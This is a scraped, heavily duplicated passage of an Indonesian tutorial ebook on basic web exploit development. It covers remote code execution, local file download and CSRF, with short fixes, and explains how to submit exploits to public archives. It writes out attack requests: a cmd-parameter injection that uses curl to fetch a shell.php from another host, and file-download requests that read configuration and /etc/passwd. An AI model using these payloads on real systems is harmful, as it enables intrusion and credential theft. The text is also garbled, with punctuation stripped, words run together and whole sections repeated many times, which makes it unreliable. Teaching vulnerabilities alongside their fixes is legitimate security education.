Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 18: Basic Web Exploit Development

0x04 - Remote Code Execution

Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini

Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd

Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah

Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi

0x04 - Remote Code Execution

Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini

http127001cmdphpcmd=[Perintah]

Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux

Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp

Perintah diatas menggunakan cURL untuk download file dari server lain

Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd

Dan masih banyak lagi

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 19: Basic Web Exploit Development

0x04 - Remote Code Execution

Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini

http127001cmdphpcmd=[Perintah]

Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux

Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp

Perintah diatas menggunakan cURL untuk download file dari server lain

Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd

Dan masih banyak lagi

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 20: Basic Web Exploit Development

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 21: Basic Web Exploit Development

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 22: Basic Web Exploit Development

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 23: Basic Web Exploit Development

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

